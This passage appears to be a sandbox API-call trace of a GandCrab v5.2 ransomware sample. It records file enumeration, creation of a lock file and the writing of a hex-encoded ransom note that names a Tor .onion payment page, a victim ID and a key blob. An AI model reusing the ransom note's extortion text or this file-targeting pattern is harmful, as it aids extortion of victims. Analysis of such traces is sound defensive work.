param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\d2ca4a09d2ca4deb61a.lock") returned 80 [0072.458] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0072.460] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.460] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.460] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\") returned 56 [0072.460] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\*" [0072.460] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5033b8 [0072.460] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.460] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.461] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.461] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.461] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.461] lstrcmpW (lpString1="Connections", lpString2=".") returned 1 [0072.461] lstrcmpW (lpString1="Connections", lpString2="..") returned 1 [0072.461] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="Connections" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0072.461] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\" [0072.461] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.461] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.462] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.462] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.462] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.462] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.462] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.462] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.462] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\\\TITWMVJL-DECRYPT.txt") returned 89 [0072.462] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\connections\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0072.463] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x